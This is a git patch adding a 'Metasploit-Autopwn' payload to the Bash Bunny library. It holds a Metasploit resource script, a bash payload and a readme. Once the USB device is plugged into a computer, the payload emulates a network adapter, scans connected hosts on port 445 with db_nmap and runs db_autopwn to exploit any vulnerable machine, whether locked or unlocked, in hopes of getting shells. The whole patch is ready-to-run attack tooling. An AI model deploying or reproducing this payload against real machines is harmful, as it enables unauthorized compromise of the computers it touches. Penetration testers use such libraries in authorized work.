From ddcd785deb69d70c3c42a0b9566d0d3f7b7dd8c4 Mon Sep 17 00:00:00 2001
From: "Mohamed A. Baset" <symbian2010@gmail.com>
Date: Thu, 7 Sep 2017 18:18:44 -0500
Subject: [PATCH] Metasploit Autopwn Bash Bunny Payload (#242)

---
 .../Metasploit-Autopwn/auto_pwn.rc            | 29 +++++++++++++++++
 .../Metasploit-Autopwn/payload.txt            | 32 +++++++++++++++++++
 .../exploitation/Metasploit-Autopwn/readme.md | 29 +++++++++++++++++
 3 files changed, 90 insertions(+)
 create mode 100644 payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
 create mode 100644 payloads/library/exploitation/Metasploit-Autopwn/payload.txt
 create mode 100644 payloads/library/exploitation/Metasploit-Autopwn/readme.md

diff --git a/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
new file mode 100644
index 00000000..a5cb4906
--- /dev/null
+++ b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
@@ -0,0 +1,29 @@
+# Connect to pre-created metasploit database called "postgres"
+db_connect postgres
+load db_autopwn
+
+# This sleep because everytime we load db_autopwn module, metasploit is rebuilding the database cache (need more digging into this to cancel this stage)
+sleep 60
+
+# Purge old data to not to be included in the attack
+hosts -d
+services -d
+
+# Start db_nmap metasploit scanning module (scan all the dhcp clients except the Bunny itself, feel free also to include any services port you want to exploit)
+db_nmap 172.16.64.2-254 -p 445 -v 1 -O --reason
+sleep 5
+
+# Show hosts after db_nmap scan
+hosts
+
+# Show services after db_nmap scan
+services
+
+# Initiate db_autopwn metasploit module
+db_autopwn -t -p -r -e -T 20
+
+# Show created metasploit sessions
+sleep 5
+sessions
+# Finish
+sleep 10
diff --git a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
new file mode 100644
index 00000000..a5d11867
--- /dev/null
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -0,0 +1,32 @@
+#!/bin/bash
+#
+# Title:         Metasploit-Autopwn
+# Author:        Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
+# Version:       0.1
+#
+#
+# Runs Metasploit db_autopwn module against the whole dhcp clients conencted
+# to the Bash Bunny device exploiting locked and unlocked machines that running
+# vulnerable OSes or services.
+# Prequisities:
+# 1. Ruby 2.4.1 installed via rbenv (the best to have ruby installed without any problems)
+# 2. You must have metasploit installation up and running in path /toos/metasploit-framework/
+# 3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
+# 4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
+
+# Script
+# LED SETUP................Setting up stuff
+# LED ATTACK...............Running Metasploit Autopwn Module
+# LED FINISH...............Attack Finished
+
+LED SETUP
+# One-time fix for adding user "postgres" to the network user groups
+usermod -a -G netdev,systemd-network,net_raw postgres
+CUCUMBER PLAID
+ATTACKMODE RNDIS_ETHERNET
+# Please adjust a nearest date/time
+# date -s "20170830 01:23"
+LED ATTACK
+# For debugging we are writing the whole output into a file in /tools
+/root/.rbenv/shims/ruby /tools/metasploit-framework/msfconsole -r /tools/auto_pwn.rc >> /tools/msfAutopwnOUTPUT.txt
+LED FINISH
diff --git a/payloads/library/exploitation/Metasploit-Autopwn/readme.md b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
new file mode 100644
index 00000000..6d970cf3
--- /dev/null
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
@@ -0,0 +1,29 @@
+# Metasploit-Autopwn
+
+* Author: Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
+* Version: Version 0.1
+* Target: All OS / services
+
+## Description:
+
+Runs Metasploit db_autopwn module against the dhcp connected client to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.
+
+## Configuration/Prequisities:
+
+1. Ruby 2.4.1 installed via 'rbenv' (the best to have ruby installed without any problems)
+2. You must have metasploit installation up and running in path /toos/metasploit-framework/
+3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
+4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
+
+
+
+## STATUS
+
+| LED                | Status                                         |
+| ------------------ | -----------------------------------------------|
+| Setup              | Setting up stuff                               |
+| ATTACK             | Running Metasploit Autopwn Module              |
+| FINISH             | Attack Finished (hopefully we got some shells) |
+
+## Discussion
+https://forums.hak5.org/topic/41737-metasploit-framework-with-db_autopwn-module-on-bashbunny/